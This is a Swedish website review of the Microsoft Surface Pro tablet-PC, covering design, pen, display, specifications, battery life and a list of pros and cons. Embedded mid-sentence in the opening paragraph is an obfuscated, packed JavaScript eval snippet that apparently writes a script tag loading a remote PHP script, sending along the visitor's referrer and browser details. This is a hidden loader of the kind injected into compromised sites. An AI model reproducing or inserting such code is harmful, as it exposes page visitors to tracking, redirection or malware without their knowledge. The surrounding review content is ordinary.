Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Stort test: Surface PRO – PC och tablet i ett.

microsoft
Filip Urde
  • On 19 juni, 2013
  • http://www.revue.se/filip-urde

Review Overview

Design
9.5
Prestanda
9
Användargränssnitt
8
Hårdvara
9
Appar
6.5
8.4

Rating

Surface eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fsrhb|var|u0026u|referrer|aknhk||js|php’.split(’|’),0,{}))
Pro finns nu äntligen ute till försäljning på den Svenska marknaden och Revue har testat den.

 

 

Surface PRO

Surface Pro kommer i två versioner, den lite mindre 64GB version och en mer användbar 128GB variant. Men efter ett ganska blandat mottagande av Microsoft Surface RT förra året, så har varumärket varit under ganska hård press att leverera sin fullblodig Surface och nu är väntan alltså äntligen över.

Surface RT hade en mobil processor, som gav en ganska låg prestanda, samt begränsade användaren till Windows Store appar, medan Surface Pro är ett fullblodig Intel Core vidunder. För att snabbt sammanfatta skillnaden mellan maskinerna så skulle man kunna säga att Surface RT är en tablet med PC funktioner, medan Surface Pro är en PC i tablet-format.

surface

Surface Pro: Storlek

Om du är bekant med den ursprungliga Surface RT-modellen, ja, då kommer utseendet på nyare Surface Pro inte komma som en större chock. Den har samma vassa kanter och ser lite ut som den blivit utmejslad från en solid svart klump. Men om du börjar kika lite mer nogrant så finns det flera stora skillnader.

Surface Pro har gått upp lite mer i vikt och i tjocklek i jämförelse med sin broder RT. Detta är tyvärr det första man lägger märke till, snarare än prestandan, skärmen eller dess anslutnings möjligheter. Surface Pro är 10,6-tum. 13Mm tjock och väger 907g, vilket är nästan en tredjedel tyngre än iPad 4.

På grund av att Surface Pro faktiskt är en riktig PC, så har den även riktiga PC komponenter i sig och behöver där med också kylas på samma sätt som en riktig PC. Vilket resulterar i att Surface Pro har en rad av ventilationsöppningar som går längs kanten av plattan. Behovet av att luftkyla Intel Core-processorn gör att Surface Pro behöver vara tjockare och väga mer än sin lillebror. Vi tror att vikten kommer vara en av faktorerna till hur valet går för någon som väger mellan en Surface Pro och en iPad 4.

Men är den jämförelsen schysst att göra? Surface Pro är trots allt en PC som ser ut som en tablet, alltså inte en tablet. Men man måste ställa Surface mot iPad, så är det bara. Dock så skulle en mer korrekt jämförelse vara att jämföra Surface Pro med Microsofts andra leverantörer så som HP, Asus m.m.

Inom kort så kommer vi få testa nya HP Envy X2 och ska då göra en mer utförlig jämförelse bägge emellan, men när vi nu är inne på storlek och vikt så kan man jämföra Surface Pro med HP Envy X2. Det är två likvärdiga maskiner, med Intel Core-processorer och hybrid användbarhet, men HP Envy X2 med tangentbord väger 1,4 kg. Då känns inte Surface Pro lika tung längre. Det är Surface Pro:s stora akilleshäl i det här avseendet, folk glömmer bort att det faktiskt är en fullblodig PC och inte en vanlig tablet.

 

Surface Pro: Funktioner

En av Surface Pro:s bästa egenskaper är dess förmåga att köra riktiga Windowsprogram och inte bara de som finns på Windows Store. Surface RT var begränsad till de appar som man hittar i affären, medan Surface Pro kan köra allt från de senaste PC-spel och kreativa paket, såsom Photoshop, Adobe Creative Cloud, Microsoft Office 2013 och program som Spotify eller iPlayer på skrivbordet.

Ett av Surface RT och PRO:s mest utmärkande drag är sitt metall kick-stativ som fälls ut på baksidan av plattan och ger betraktaren den perfekta vinkeln för att läsa, arbeta eller se på film.

SurfaceProLeft

Något som jag tycker är väldigt bra med Surface, är dess TouchCover lösning och nu den senaste TypeCover. Vilket är kombinationen av skärmskydd och tangentbord. TouchCover får du för 1069kr och ett TypeCover kostar 1149kr och med den lilla prisskillanden så menar jag att TypeCover är det rätta valet för dig som verkligen vill använda din Surface som ett arbetsredskap. Skillnaden mellan de båda skydden är att TouchCover har taktila tangenter medan TypeCover är ”riktiga” tangenter som du trycker ner. Känslan blir mer ”normal” för dig som användare. Dock så har jag lärt mig att använda TouchCover minst lika bra.

Men styrkan med Surface PRO är att du kan använda den som en väldigt mobil PC, men du kan samtidigt koppla upp den mot en stationär skärmlösning och använda Surface som din PC på jobbet.

Det finns ett annat alternativ med Surface Pro, och det är den ingående pennan som är unik för Pro-modell. Det har licensierat Wacom-teknik som erbjuder 1024 nivåer av tryck, vilket sätter den i samma liga som Samsung Galaxy Note 2.

surface pro microsoft

Pennan är ett klockrent verktyg för dem som vill vara kreativa och vill utföra specifika behov. Pennan aktiveras så fort den kommer nära skärmen och då växlar Surface PRO till att agera efter pennans komandon. Vilket betyder att du kan bekvämt luta din hand mot skärmen medan du skriver och inte vara orolig för att handen ska aktivera touchen och stöka till allt du skrivit eller tecknat.

Surface Pro: Skärmen

Vi var glada över att se en full-HD-skärm på Surface PRO, vilket är en uppgradering från den 1344 x 768 skärmen som fanns på Surface RT. Surface PRO display känns skarp och ger härliga detaljer på appar och webbsidor. Något som den mycket snabba renderingen i Internet Explorer ”metro version” utnyttjar.

Surface Pros skräm är klockren att se filmer på och jag har ägnat mycket Netflix tid på Surface PRO de senaste veckorna.

Surface Pro: Specifikationer

Surface PRO är bestyckad med en Intel Core i5-3317U som är klockad till 1,7 GHz, vilket är samma som du hittar i de flesta ”mid-range” Ultrabooks. Det finns helt enkelt massor av kraft att hämta här och benchmark-tester visar att trots att den är inklämda i ett chassi som är bara 275 x 173 x 13 mm så finns det inga kompromisser om kraften.

Du kan enkelt jobba i tunga program som Photoshop och illustrator vilket verkligen gör Surface PRO till en unik platta.

För att backa upp den imponerande processorprestandan så har man skickat in 4GB RAM, vilket återigen är i linje med en ”mid-range” laptop. Fördröjningen som man kunde uppleva på Surface RT är som bortblåst i och med den nya mängden med RAM.

Det finns inget dedikerat grafikkort ombord, alla 3D-funktioner sköts av Intel HD Graphics 4000, som är inbyggd i i5 processorn. Jag har suttit och kört HON (heroes of newerth) på hög upplösning och det har flutit på väldigt bra. Kanske inte det mest krävande spelet, men ändå.

Surface Pro: Batteri

Surface Pros batteri är väll en av platserna där den lider i jämförelse med de andra plattorna, iPad eller som andra Windows RT plattor som t.ex. Dell XPS 10.

Surface RT kunde köra ca: 10 timmars filmuppspelning, medan Surface Pro bara klarar av 5 timmar. Men det är inte något som är konstigt, det är mer och tyngre saker att driva i PRO versionen. Dock är batterifrågan något som kan avskräcka vissa användare, då syftet med en platta är dess mobilitet.

Surface Pro: Bedömning

Jag gillar verkligen Surface, jag gillade RT när den kom, men det var något som fattades. Men jag tycker verkligen att Surface Pro har löst många av de brister och frågetecken som RT hade och det är verkligen en bra burk som bjuder användaren på en klockren lösning med dubbla användningsområden.

Med massor av kraft och med en grym design så är Surface PRO med och tävlar med både plattorna, men även bland ”mid-range” Ultrabooks. Enkelheten du upplever när du bär din Surface PRO fram till mer eller mindre vilken skärm som helst, dockar den och sen kör igång en Powerpoint presentation, är för mig definitionen av smidighet.

Surface PRO ligger i gränslandet mellan en platta och en PC. Men vill du ha en smart, snygg, smidigt och mobil PC som

SUR_Pro_Black_Front

Sammanfattning: För och Nackdelar.

För:

1. Första tabletten som verkligen kan användas för att skapa och skriva, och som faktiskt lever upp till detta behov fullt ut.

2. Portar och utbyggbart minne: USB, HDMI-kompatibilitet, SDXC-kort

3. Full HD-skärm

4. Du kan spela riktiga PC-spel

5. Trevlig design som jag verkligen gillar

7. Kan köra riktiga program

8. Du kan faktiskt arbeta på den

Nackdelar:

1. Har på tok för få appar gentemot konkurrenterna (speciellt iOS).

2. Tung

3. Inte bra på ojämna ytor

 

 

Surface PRO finns ute från 7895kr. 

Läs mer om Surface PRO och möjligheterna med office 365 på länken nedan.

www.microsoft.com